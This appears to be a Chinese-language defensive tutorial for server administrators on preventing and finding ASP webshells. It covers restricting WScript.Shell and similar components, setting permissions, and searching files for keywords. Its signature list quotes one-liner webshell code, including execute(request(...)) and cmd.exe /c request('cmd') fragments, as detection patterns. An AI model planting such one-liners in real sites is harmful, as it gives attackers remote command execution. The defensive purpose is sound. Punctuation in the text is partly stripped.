ASP木马猖獗基于ASP的网站时时处于危险之中要让网站的安全随时得到保障需要我们的服务器管理员要做些什么呢如何防范ASP木马呢?要防范ASP木马那么我们就需要知道它的运行原理和机制下面我们看一段代码
Set oscript = ServerCreateObject("WscriptSHELL") "建立了一个名为oscript的WscriptSHELL对象用于命令的执行"
Set oscriptNet = ServerCreateObject("WscriptNETWORK")
Set oFileSys = ServerCreateObject("scriptingFileSystemObject")
上面三行代码创建了WscriptSHELLWscriptNETWORKscriptingFileSystemObject三个对象我们可以看出asp木马的运行原理就是通过调用组件对象等完成的
通过分析一些asp木马我们看出主要是通过个组件运行的第一个是我们都知道的FSO 需要FSO支持也就是"scriptingFileSystemObject"项的支持那么有人会说是不是删除这个组件就可以了呀 不可以的因为现在很多程序都是要用到FSO这个组件的所以是觉得不能限制的不然正常的程序也运行不了现在网上有很多教程告诉别人删除或限制使用这些方法都很极端我不推荐大家使用我们再说另外几个组件"shellapplication""WscriptSHELL"等危险组件 一般的木马都是要使用这几个组件的 即使你把fso组件限制的话你不去限制别的组件的的话一样不能起到效果的对于fso组件之外的其他的几个组件我们平时是不太用的所以我们可以直接在注册表中的HKEY_CLASSES_ROOT中找到
找到"shellapplication""WscriptSHELL"等危险的脚本对象(因为它们都是用于创建脚本命令通道的)进行改名或删除也就是限制系统对“脚本SHELL”的创建ASP木马也就成为无本之木无米之炊运行不起来了如果我们自己要使用的话那么我们就不要删除直接改下名字如果是改名要改得复杂一点不要让别人猜到了我们在要用的程序里面直接把调用的名字改成我们刚才修改的名字就可以了
对组件进行限制之后我们还应该对服务器的权限进行严格的设置这里我就不说了由于篇幅问题等下不知道要写多久了大家可以参考网上的一些安全权限设置 我们对权限和组件等等设置完了之后基本上就能防止asp木马的危害了
另外有一点应该注意如果确实发现木马了查杀完之后应该将具有管理权限的各类帐号都进行修改包括论坛的帐号数据库帐号以及服务器操作系统帐号FTP 帐号等如果我们做到了这个几点话我们的服务器基本上是安全了呵呵为什么说是基本的呢因为这个世界上根本就没有安全的服务器了只不过我们刚才说到的设置只是能够防范大部分asp木马的的侵害不排除一些别的因素比如说提限说白了防范asp木马就是要限制组件设置严格的权限和保证asp程序的安全
我们下面说下怎么样查杀asp木马了我根据自己的一些经验说几种方法
时间比较法
按时间顺序找到最近被改动的asp文件 打开看下是不是木马呢什么看不懂代码 那你就把不是你自己放的asp文件名字看一眼就看的出的比如说diyapdmaspangelaspshellasp什么的文件可疑的asp文件不是你自己创建的删除或直接访问下看下是不是木马就可以了
查找关键字asp木马都是有关键字的也就像病毒的特征码我们用windows自带的搜索功能就能查找到 查找包含内容为关键字的所有文件就可以了找到以后看下就可以了有时候能查找到一些asp的大文件如果是虚拟主机的话一般是数据库文件改成asp的了如果是一句话木马的关键字就小心了如果是大型木马的关键字咱们访问一下看看我不赞成把数据库改成asp的至于为什么大家都知道吧
我整理了一些特征码现在给大家
gxgl
lcx
<script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Requestform(’#’)+’’)</script>
输入马的内容
session("b")
request("kker")
非常遗憾您的主机不支持ADODBStream不能使用本程序
传至服务器已有虚拟目录
警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!!
<%execute request("value")%>
ccopus
<%execute(request("#"))%>
<script language="vbscript" runat=server>if reques(#")<>"" then execute(request("#"))</script>
("cmdexe /c "&requestform("cmd"))
("cmdexe /c "&request("cmd"))
("cmdexe /c "&request("c"))
这些都是关键字了全部是我从木马里面一个一个提取出来的如果有这些特征的话一般都是木马 不过大家最好打开看一下不排除特殊情况如果你的网站里有类似代码<iframe src="***com" ></iframe> 估计可能是被加入的恶意连接或着被挂马了好狠毒那么请在关键词中搜索iframe src
大家也可以用明小子的asp木马扫描的这个小工具拉把我的关键字放进去扫描一下挺方便的呵呵
在网站结构清楚的情况下浏览目录法能快速确定木马在不该出现的地方出现的文件管他是不是木马都可以删比如说dvbbs下的 upfile这些文件夹里是不应该出现asp文件的我们一发现就删除就是了 不过要求管理员对自己的网站目录结构熟
有一种方法可以试下就是做好备份一旦发现有人入侵马上还原这样什么木马也不怕了不过要注意的是把保证备份文件是安全的 要是备份文件里也有木马让就没搞一样的
用asp木马追捕的文件查杀网上有下载的另外我们常用的杀毒软件也有这样的功能我推荐大家采用卡巴斯机效果非常好几乎能查杀如今所有流行的asp木马
上面只是简单的介绍了一下asp木马的一些查杀方法当然这些只是亡养补牢了我们最好对服务器系统进行严格的权限限制让黑客即使是上传了木马也没有什么用这里权限的限制我就不多说了等下不知道要写多少网上的资料也很全面的大家可以自己去查找西而且现在说来说去asp木马的隐藏方法确实是很高明asp木马代码加密图片合并文件时间修改还有要命的系统漏洞利用等等这对于要百分之百查杀asp木马的查杀几乎不可能我们只有堵住木马上传的源头 asp程序尽量用最新版本网站中的上传途径自己应该特别注意对于不需要脚本运行的文件夹在iis里面设置执行许可为无还有就是管理员要求有良好的安全意识不然的话谈不上安全了并且我们设置了权限之后 传了也是白传
